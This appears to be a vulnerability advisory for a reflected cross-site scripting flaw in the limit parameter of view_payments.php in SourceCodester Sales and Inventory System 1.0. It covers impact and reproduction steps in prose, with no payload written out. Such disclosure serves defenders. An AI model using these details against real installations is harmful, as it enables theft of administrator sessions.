SourceCodester Sales and Inventory System Reflected Cross-Site Scripting Vulnerability

A reflected cross-site scripting vulnerability has been identified in SourceCodester Sales and Inventory System version 1.0. The issue resides in the view_payments.php file, specifically within the limit parameter of GET requests. The application does not adequately sanitize user input, enabling remote attackers to inject arbitrary web scripts or HTML through a crafted URL. This vulnerability could be exploited to steal session cookies from logged-in administrators or perform actions on their behalf.

Impact

Exploitation of this vulnerability allows for session hijacking, where an attacker can steal session cookies from an administrator. This could lead to unauthorized actions being performed on behalf of the admin.

Reproduction

To reproduce this vulnerability, deploy SourceCodester Sales and Inventory System 1.0 locally and log in as an administrator. Then, access the view_payments.php page and include a crafted limit parameter in the URL that injects a script, such as an alert payload. When the page is loaded, the injected script will execute, demonstrating the cross-site scripting vulnerability.